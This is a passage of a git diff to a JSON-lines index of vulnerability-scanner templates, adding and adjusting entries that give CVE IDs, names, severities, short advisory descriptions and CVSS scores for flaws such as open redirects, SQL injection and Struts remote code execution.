code.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2009/CVE-2009-1151.yaml"} @@ -88,6 +94,7 @@ {"ID":"CVE-2010-1534","Info":{"Name":"Joomla! Component Shoutbox Pro - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1534.yaml"} {"ID":"CVE-2010-1535","Info":{"Name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1535.yaml"} {"ID":"CVE-2010-1540","Info":{"Name":"Joomla! Component com_blog - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1540.yaml"} +{"ID":"CVE-2010-1586","Info":{"Name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-1586.yaml"} {"ID":"CVE-2010-1601","Info":{"Name":"Joomla! Component JA Comment - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1601.yaml"} {"ID":"CVE-2010-1602","Info":{"Name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1602.yaml"} {"ID":"CVE-2010-1603","Info":{"Name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1603.yaml"} @@ -163,6 +170,7 @@ {"ID":"CVE-2011-5107","Info":{"Name":"Alert Before Your Post \u003c= 0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5107.yaml"} {"ID":"CVE-2011-5179","Info":{"Name":"Skysa App Bar 1.04 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5179.yaml"} {"ID":"CVE-2011-5181","Info":{"Name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5181.yaml"} +{"ID":"CVE-2011-5252","Info":{"Name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2011/CVE-2011-5252.yaml"} {"ID":"CVE-2011-5265","Info":{"Name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2011/CVE-2011-5265.yaml"} {"ID":"CVE-2012-0392","Info":{"Name":"Apache Struts2 S2-008 RCE","Severity":"critical","Description":"The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2012/CVE-2012-0392.yaml"} {"ID":"CVE-2012-0394","Info":{"Name":"Apache Struts \u003c2.3.1.1 - Remote Code Execution","Severity":"critical","Description":"Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not \"a security vulnerability itself.\"\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2012/CVE-2012-0394.yaml"} @@ -184,11 +192,13 @@ {"ID":"CVE-2012-4878","Info":{"Name":"FlatnuX CMS - Directory Traversal","Severity":"high","Description":"A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-4878.yaml"} {"ID":"CVE-2012-4889","Info":{"Name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4889.yaml"} {"ID":"CVE-2012-4940","Info":{"Name":"Axigen Mail Server Filename Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-4940.yaml"} +{"ID":"CVE-2012-4982","Info":{"Name":"Forescout CounterACT 6.3.4.1 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-4982.yaml"} {"ID":"CVE-2012-5913","Info":{"Name":"WordPress Integrator 1.32 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-5913.yaml"} {"ID":"CVE-2013-1965","Info":{"Name":"Apache Struts2 S2-012 RCE","Severity":"critical","Description":"Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-1965.yaml"} {"ID":"CVE-2013-2248","Info":{"Name":"Apache Struts - Multiple Open Redirection Vulnerabilities","Severity":"medium","Description":"Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2013/CVE-2013-2248.yaml"} {"ID":"CVE-2013-2251","Info":{"Name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","Severity":"critical","Description":"In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\", or \"redirectAction:\" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-2251.yaml"} {"ID":"CVE-2013-2287","Info":{"Name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2013/CVE-2013-2287.yaml"} +{"ID":"CVE-2013-2621","Info":{"Name":"Telaen =\u003e v1.3.1 - Open Redirect","Severity":"medium","Description":"Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2013/CVE-2013-2621.yaml"} {"ID":"CVE-2013-3526","Info":{"Name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter.\"","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2013/CVE-2013-3526.yaml"} {"ID":"CVE-2013-3827","Info":{"Name":"Javafaces LFI","Severity":"medium","Description":"An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-3827.yaml"} {"ID":"CVE-2013-4117","Info":{"Name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2013/CVE-2013-4117.yaml"} @@ -335,9 +345,11 @@ {"ID":"CVE-2016-3081","Info":{"Name":"Apache S2-032 Struts - Remote Code Execution","Severity":"high","Description":"Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2016/CVE-2016-3081.yaml"} {"ID":"CVE-2016-3088","Info":{"Name":"Apache ActiveMQ Fileserver - Arbitrary File Write","Severity":"critical","Description":"Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-3088.yaml"} {"ID":"CVE-2016-3978","Info":{"Name":"Fortinet FortiOS - Open Redirect/Cross-Site Scripting","Severity":"medium","Description":"FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the \"redirect\" parameter to \"login.\"","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-3978.yaml"} +{"ID":"CVE-2016-4437","Info":{"Name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","Severity":"high","Description":"Apache Shiro before 1.2.5, when a cipher key has not been configured for the \"remember me\" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2016/CVE-2016-4437.yaml"} {"ID":"CVE-2016-4975","Info":{"Name":"Apache mod_userdir CRLF injection","Severity":"medium","Description":"Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-4975.yaml"} {"ID":"CVE-2016-4977","Info":{"Name":"Spring Security OAuth2 Remote Command Execution","Severity":"high","Description":"Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-4977.yaml"} {"ID":"CVE-2016-5649","Info":{"Name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","Severity":"critical","Description":"NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-5649.yaml"} +{"ID":"CVE-2016-6195","Info":{"Name":"vBulletin \u003c= 4.2.3 - SQL Injection","Severity":"high","Description":"vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-6195.yaml"} {"ID":"CVE-2016-6277","Info":{"Name":"NETGEAR Routers - Remote Code Execution","Severity":"high","Description":"NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-6277.yaml"} {"ID":"CVE-2016-6601","Info":{"Name":"ZOHO WebNMS Framework \u003c5.2 SP1 - Local File Inclusion","Severity":"high","Description":"ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-6601.yaml"} {"ID":"CVE-2016-7552","Info":{"Name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","Severity":"critical","Description":"Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-7552.yaml"} @@ -366,6 +378,7 @@ {"ID":"CVE-2017-12583","Info":{"Name":"DokuWiki - Cross-Site Scripting","Severity":"medium","Description":"DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-12583.yaml"} {"ID":"CVE-2017-12611","Info":{"Name":"Apache Struts2 S2-053 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-12611.yaml"} {"ID":"CVE-2017-12615","Info":{"Name":"Apache Tomcat Servers - Remote Code Execution","Severity":"high","Description":"Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2017/CVE-2017-12615.yaml"} +{"ID":"CVE-2017-12617","Info":{"Name":"Apache Tomcat - Remote Code Execution","Severity":"high","Description":"When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2017/CVE-2017-12617.yaml"} {"ID":"CVE-2017-12629","Info":{"Name":"Apache Solr \u003c= 7.1 - XML Entity Injection","Severity":"critical","Description":"Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-12629.yaml"} {"ID":"CVE-2017-12635","Info":{"Name":"Apache CouchDB 1.7.0 / 2.x \u003c 2.1.1 - Remote Privilege Escalation","Severity":"critical","Description":"Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-12635.yaml"} {"ID":"CVE-2017-12637","Info":{"Name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","Severity":"high","Description":"SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-12637.yaml"} @@ -390,6 +403,7 @@ {"ID":"CVE-2017-17059","Info":{"Name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-17059.yaml"} {"ID":"CVE-2017-17451","Info":{"Name":"WordPress Mailster \u003c=1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-17451.yaml"} {"ID":"CVE-2017-17562","Info":{"Name":"Embedthis GoAhead \u003c3.6.5 - Remote Code Execution","Severity":"high","Description":"description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2017/CVE-2017-17562.yaml"} +{"ID":"CVE-2017-17731","Info":{"Name":"DedeCMS 5.7 - SQL Injection","Severity":"critical","Description":"DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-17731.yaml"} {"ID":"CVE-2017-17736","Info":{"Name":"Kentico - Installer Privilege Escalation","Severity":"critical","Description":"Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 are susceptible to a privilege escalation attack. An attacker can obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-17736.yaml"} {"ID":"CVE-2017-18024","Info":{"Name":"AvantFAX 3.3.3 - Cross-Site Scripting","Severity":"medium","Description":"AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18024.yaml"} {"ID":"CVE-2017-18536","Info":{"Name":"WordPress Stop User Enumeration \u003c=1.3.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18536.yaml"} @@ -414,7 +428,7 @@ {"ID":"CVE-2017-9288","Info":{"Name":"WordPress Raygun4WP \u003c=1.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Raygun4WP 1.8.0 contains a reflected cross-site scripting vulnerability via sendtesterror.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-9288.yaml"} {"ID":"CVE-2017-9416","Info":{"Name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","Severity":"medium","Description":"Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2017/CVE-2017-9416.yaml"} {"ID":"CVE-2017-9506","Info":{"Name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","Severity":"medium","Description":"The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-9506.yaml"} -{"ID":"CVE-2017-9791","Info":{"Name":"Apache Struts2 S2-053 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.1.x and 2.3.x with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-9791.yaml"} +{"ID":"CVE-2017-9791","Info":{"Name":"Apache Struts2 S2-053 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.1.x and 2.3.x with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-9791.yaml"} {"ID":"CVE-2017-9805","Info":{"Name":"Apache Struts2 S2-052 - Remote Code Execution","Severity":"high","Description":"The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2017/CVE-2017-9805.yaml"} {"ID":"CVE-2017-9822","Info":{"Name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","Severity":"high","Description":"DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2017/CVE-2017-9822.yaml"} {"ID":"CVE-2017-9833","Info":{"Name":"BOA Web Server 0.94.14 - Arbitrary File Access","Severity":"high","Description":"BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of \"../..\" using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-9833.yaml"} @@ -446,7 +460,7 @@ {"ID":"CVE-2018-11709","Info":{"Name":"WordPress wpForo Forum \u003c= 1.4.11 - Cross-Site Scripting","Severity":"medium","Description":"WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-11709.yaml"} {"ID":"CVE-2018-11759","Info":{"Name":"Apache Tomcat JK Connect \u003c=1.2.44 - Manager Access","Severity":"high","Description":"Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-11759.yaml"} {"ID":"CVE-2018-11776","Info":{"Name":"Apache Struts2 S2-057 - Remote Code Execution","Severity":"high","Description":"Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2018/CVE-2018-11776.yaml"} -{"ID":"CVE-2018-11784","Info":{"Name":"Apache Tomcat - Open Redirect","Severity":"medium","Description":"Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2018/CVE-2018-11784.yaml"} +{"ID":"CVE-2018-11784","Info":{"Name":"Apache Tomcat - Open Redirect","Severity":"medium","Description":"Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2018/CVE-2018-11784.yaml"} {"ID":"CVE-2018-12031","Info":{"Name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","Severity":"critical","Description":"Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-12031.yaml"} {"ID":"CVE-2018-12054","Info":{"Name":"Schools Alert Management Script - Arbitrary File Read","Severity":"high","Description":"Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-12054.yaml"} {"ID":"CVE-2018-1207","Info":{"Name":"Dell iDRAC7/8 Devices - Remote Code Injection","Severity":"critical","Description":"Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability\nwhich could be used to execute remote code. A remote unauthenticated attacker may\npotentially be able to use CGI variables to execute remote code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-1207.yaml"} @@ -573,6 +587,7 @@ {"ID":"CVE-2019-0230","Info":{"Name":"Apache Struts \u003c=2.5.20 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-0230.yaml"} {"ID":"CVE-2019-10068","Info":{"Name":"Kentico CMS Insecure Deserialization Remote Code Execution","Severity":"critical","Description":"Kentico CMS is susceptible to remote code execution via a .NET deserialization vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-10068.yaml"} {"ID":"CVE-2019-10092","Info":{"Name":"Apache HTTP Server \u003c=2.4.39 - HTML Injection/Partial Cross-Site Scripting","Severity":"medium","Description":"Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was 